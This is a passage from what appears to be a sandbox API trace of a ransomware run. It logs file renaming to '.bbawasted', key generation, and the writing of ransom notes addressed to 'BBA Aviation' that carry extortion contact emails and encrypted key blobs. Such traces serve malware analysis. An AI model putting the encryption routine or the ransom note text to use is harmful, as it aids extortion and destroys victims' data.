(lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sAUHKrEmHnHKwb-hpI.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\sauhkremhnhkwb-hpi.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0218.503] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.505] SetEndOfFile (hFile=0x280) returned 1 [0218.505] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.505] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.505] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sAUHKrEmHnHKwb-hpI.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\sauhkremhnhkwb-hpi.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sAUHKrEmHnHKwb-hpI.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\sauhkremhnhkwb-hpi.pptx.bbawasted")) returned 1 [0218.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sAUHKrEmHnHKwb-hpI.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\sauhkremhnhkwb-hpi.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0218.506] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0218.656] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x14e13 [0218.656] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14e13) returned 0x5f0000 [0218.656] CloseHandle (hObject=0x294) returned 1 [0218.659] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.660] CloseHandle (hObject=0x27c) returned 1 [0218.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0218.660] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5e88) returned 1 [0218.661] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0218.661] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0218.661] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0218.662] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0218.662] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0218.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0218.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0218.879] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YHw4j0pb453vx+1uiQ+5/mPmAXyA4R83gLuuwtb4SMDyTHlOOosql5FNqbYsQFRW\r\nH2wDgrPthRITXzmEyLLhYY8dlYCTtaFA1ev+9QE/791iVcdRag3ruSi8HyRe/4Rm\r\nqAxJI3jO7/3hVCwKyVk+68KkvpceVJiVI/Q8bkwQIPV+Plq5I8xu0gsVh66aLWAl\r\naAYhstCcQk9n6YpBi66edzz7NsMotEod9TdcDbB/sx2ZdZCHIbBkVL+yv+TrBQtv\r\nVdPH0552mLwhw+UO8tNq1EDM86oypZtc3pBIDTRuojUasbkqR8zgoyBs4vTq6L5l\r\nAFQhGwfk8HFArymrIgKvBNxDgLnvTaIj0UAnmQW2joml13EIkxTzUDtLhEBs8p+c\r\nAwiuDTNc2cn7bJvgw7AzR+8AwG3yFl8MmJuZ5Yr2kaL0h8WlAX4QOzGW+toB/Wt4\r\nYRiRouzhTFp2cpvusxcAVHHtTxQn+glfwdDGW+fQCSMl/1+qCe5pe5HrIYX8rBcr\r\nu+ASCgJJbW6k1k9XZ+J+s1KHQ49f2TUqUohuNqobJsds7rAaftvoySB8JGjUMFSt\r\n09rWJqmGtaLUmgWaglVCc8b6cdKWpYzmQectK5VLuBrX1CtDv8464i6UkYnVfVCs\r\nWoWc0346d2jwAIpnLzQSy8qlRfvPRVEy6dFLU5Vlrhd=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.880] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.880] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0218.880] SetEndOfFile (hFile=0x280) returned 1 [0218.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0218.883] CloseHandle (hObject=0x280) returned 1 [0218.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0218.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0718 | out: hHeap=0x660000) returned 1 [0218.884] _aulldvrm () returned 0x0 [0218.884] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0218.884] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0218.885] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0218.885] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\u0j8p9EEnG1Puo3U_l.docx") returned 53 [0218.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0218.885] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0218.885] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a68a0) returned 1 [0218.886] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0218.886] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0218.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\u0j8p9EEnG1Puo3U_l.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\u0j8p9eeng1puo3u_l.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0218.886] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.888] SetEndOfFile (hFile=0x280) returned 1 [0218.888] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.888] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0218.888] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\u0j8p9EEnG1Puo3U_l.docx" (normalized: "c:\\users\\fd1hvy\\documents\\u0j8p9eeng1puo3u_l.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\u0j8p9EEnG1Puo3U_l.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\u0j8p9eeng1puo3u_l.docx.bbawasted")) returned 1 [0218.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\u0j8p9EEnG1Puo3U_l.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\u0j8p9eeng1puo3u_l.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0218.889] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0218.890] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x102bb [0218.890] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x102bb) returned 0x5f0000 [0218.890] CloseHandle (hObject=0x27c) returned 1 [0218.892] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.893] CloseHandle (hObject=0x294) returned 1 [0218.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0218.894] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0218.894] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.894] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0218.894] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0218.895] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0218.895] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0219.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0219.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0219.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.256] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]P1bomPpv1JE42gquS7ixANeRUa9anLbAZ0EhAv8spzTbhy9ar2p4vOR6R2h+R5bR\r\novtRa8VT30//G99Mbdv1GH70ZsRuk+gkZ9wWyVfz5GPjg9PiVZjPj1Lu1Ov6KOGV\r\nhPYYgalwg5Ynszswu7p7Gl1jKi1F8XNkqNrBdwDFesgtQoZnmMSa1jV62GRmu+Uh\r\nnmIThYDvAvgydW6xUTCwj72BEgqV5EAmBlCZTg+j5SQLFRwALMiu2DJ+lqkUqOXZ\r\nBoz0j9ZM3Zlh8E7kSWcowVMoHeKZ8mYPqaBs1pnSEAbV8MPpReWEpk9HRxFKjauI\r\nE8AzziHIu5q2u1AOkxZSaSYHvLjdW2Tjb1tyjiARJPBUFS1kTCOErdhLoG4HeIax\r\njX+eW2YTs2NMEEy8H7KXQI4SkX9LYcgn1Q77ZjlHZn1zNvADy7MFXr3VcTZrUdXt\r\nTHlPYU9HUrDIlFPAfFRIdClgDlKQEb8ODvQiLLJZHTKe5P1CYheEKlYW9lYJvUSl\r\nlIeZYvv4JQhkzImGGzVhtpXUgTZyFOOGjoxmO9juhvcp3+PED36OK8FtBoMhtOaJ\r\niF/3pg1pmamILm5J8bSmcSbg8hkofIr9x/6WGUcn0qREwHx19DbGl2L4jbta8oC5\r\n+sfeK3LBOAmuPn5/3oaTtFzP6glxFBCEC04pHKKjTR2=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0219.256] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0219.256] SetEndOfFile (hFile=0x280) returned 1 [0219.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.259] CloseHandle (hObject=0x280) returned 1 [0219.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0219.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b07e0 | out: hHeap=0x660000) returned 1 [0219.260] _aulldvrm () returned 0x0 [0219.260] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0219.261] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0219.261] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0219.261] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YBEb8DzTaTv0ODSR5u6.xlsx") returned 54 [0219.261] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6c4b88 [0219.261] lstrcpyW (in: lpString1=0x6c4bf4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.261] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.261] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5e88) returned 1 [0219.262] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.262] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0219.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YBEb8DzTaTv0ODSR5u6.xlsx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ybeb8dztatv0odsr5u6.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0219.263] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.265] SetEndOfFile (hFile=0x280) returned 1 [0219.265] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.266] lstrcpyW (in: lpString1=0x6c4bf4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YBEb8DzTaTv0ODSR5u6.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ybeb8dztatv0odsr5u6.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YBEb8DzTaTv0ODSR5u6.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ybeb8dztatv0odsr5u6.xlsx.bbawasted")) returned 1 [0219.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YBEb8DzTaTv0ODSR5u6.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ybeb8dztatv0odsr5u6.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0219.267] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0219.267] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x338d [0219.267] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x338d) returned 0x5f0000 [0219.268] CloseHandle (hObject=0x294) returned 1 [0219.268] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0219.269] CloseHandle (hObject=0x27c) returned 1 [0219.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0219.269] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0219.270] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0219.270] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0219.270] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0219.271] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0219.271] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0219.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0219.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0219.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.282] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]UQ0f27LYuVT8KS7oQT7Gd0cak+0flTusITt18pElHgGb9mt/zmVX6TtLcyu3BIIp\r\n1ZgPjQrOl6YRvq82idsRMsQgszTw+ett9s5e4+iO595Fs2Da/sN8m4u0BS5HHxUM\r\njaPi3EcPOo4B8FazEumOK6lTvjbrMx2N0w9+MUpWD0pEEEe721m6WXEU6AoNyR7n\r\nj6O5E9BUhJn5dnD0958XpmiLRfu4YkY1HHKcDEaJeF9QZSG9Efa7bVSgtzd3ABMR\r\nHbUEWKfMVOpVGnWNO9ZqwK3kX8Ldlsui+bN5Czbt32pBK6FvdAGBjuJtjPVN4CJH\r\nhpbED72BVq7ZcZMp2NVt38ba04IlL5++Q0es4+KVzdZKkIi5ZaAdLXas8VdCvhbK\r\nj2O0ALiw7JAPhTkhRr4dgCvhI2ISobh+N3LG2dP2KMh1IqDPcIzqQ+lMptVP4qzA\r\nYVk/6TjF8Ugt4A6RkvmUPQWt97uPu5xqtorhbjSqV3Xeo8Q2lqde7tVS6C4JdLEk\r\neJwxHJOUmrvTQ4BUOkhyKAC6zYdW6q5oG6hqyEgjxQRhXf/7JTQtfdcdEYQizfgW\r\n5Z3DHaeQYUjpUxjKNz1qWZNzwleUv888UO+lTwv7gEQU+p/zq3g120GQX6b4kAMC\r\n3OrhvuXUDbpKTaYHOJSmDZbNKc/Zizrm3i3mPwwHZLQ=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0219.283] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0219.283] SetEndOfFile (hFile=0x280) returned 1 [0219.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.286] CloseHandle (hObject=0x280) returned 1 [0219.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0219.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6a50 | out: hHeap=0x660000) returned 1 [0219.286] _aulldvrm () returned 0x0 [0219.286] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0219.287] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0219.287] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0219.287] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YqttLt.docx") returned 41 [0219.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x6c4b88 [0219.287] lstrcpyW (in: lpString1=0x6c4bda, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.288] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0219.288] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.288] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0219.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YqttLt.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\yqttlt.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0219.289] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.290] SetEndOfFile (hFile=0x280) returned 1 [0219.290] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.291] lstrcpyW (in: lpString1=0x6c4bda, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YqttLt.docx" (normalized: "c:\\users\\fd1hvy\\documents\\yqttlt.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YqttLt.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\yqttlt.docx.bbawasted")) returned 1 [0219.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\YqttLt.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\yqttlt.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0219.292] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0219.292] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1698e [0219.292] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1698e) returned 0x5f0000 [0219.293] CloseHandle (hObject=0x27c) returned 1 [0219.482] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0219.530] CloseHandle (hObject=0x294) returned 1 [0219.530] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 